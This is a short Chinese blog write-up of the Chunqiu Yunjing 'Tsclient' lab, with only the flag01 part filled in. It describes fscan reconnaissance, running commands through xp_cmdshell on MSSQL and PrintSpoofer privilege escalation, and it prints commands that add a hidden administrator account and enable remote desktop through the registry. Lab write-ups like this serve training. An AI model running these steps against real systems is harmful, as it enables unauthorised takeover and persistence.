春秋云镜Tsclient

发表于2025-03-30更新于2025-03-30

字数总计:153阅读时长:1分钟云南评论数:

春秋云镜Tsclient

Moonbeaut2025-03-302025-03-30

春秋云镜Tsclient

一、简介

二、flag01

打开环境，探测端口

fscan扫描发现mssql服务开启

使用mdtu连接上去，先激活xpcmdshell，再执行命令，得到当前用户是mssqlserver

接下来用土豆提权，使用几个土豆都报错，最后使用PrintSpoofer提权成功

PrintSpoofer64.exe -c -i cmd

接下来肯定是要添加上一个管理员用户并打开3389端口，方便后面远程桌面连接上去

net user myiiing qwer1234! /add
net localgroup administrators myiiing /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

flag01在Adminstrator文件夹下面

二、flag02

三、flag03

Moonbeaut

渐天如水，素月当午。

原创春秋云镜Tsclient

打赏作者

感谢你赐予我前进的力量

微信
支付宝

赞赏者名单

因为你们的支持让我意识到写文章的价值🙏

本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 myiiing的灵感小站！

匿名评论隐私政策

✅ 你无需删除空行，直接评论以获取最佳展示效果

播放音乐

数据库加载中